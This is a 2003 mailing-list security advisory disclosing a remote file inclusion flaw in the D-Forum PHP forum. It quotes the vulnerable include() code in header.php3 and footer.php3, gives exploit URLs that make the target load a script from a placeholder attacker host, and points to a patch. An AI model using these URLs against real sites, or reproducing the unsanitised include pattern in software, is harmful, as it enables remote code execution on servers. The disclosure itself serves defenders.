Vulnwatch mailing list archives
D-Forum (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 16 Feb 2003 18:06:15 +0100
Informations : °°°°°°°°°°°°°° Website : http://www.adalis.fr/adalis.html Versions : 1.00 -> 1.11 Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° /includes/header.php3 : --------------------------- <?php if ($my_header!="") { include ($my_header); } else { ?> ... -------------------------- /includes/footer.php3 : --------------------------- ... if ($my_footer!="") { include ($my_footer); } else { ?> ... --------------------------- Exploits : °°°°°°°°°°http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt or http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt with
http://[attacker]/script.txt Patch : °°°°°°° A patch can be found on http://www.phpsecure.info . More details : °°°°°°°°°°°°°° (in French) http://www.frog-man.org/tutos/5holes8.txt frog-m@n _________________________________________________________________MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
Current thread:
- D-Forum (PHP) Frog Man (Feb 17)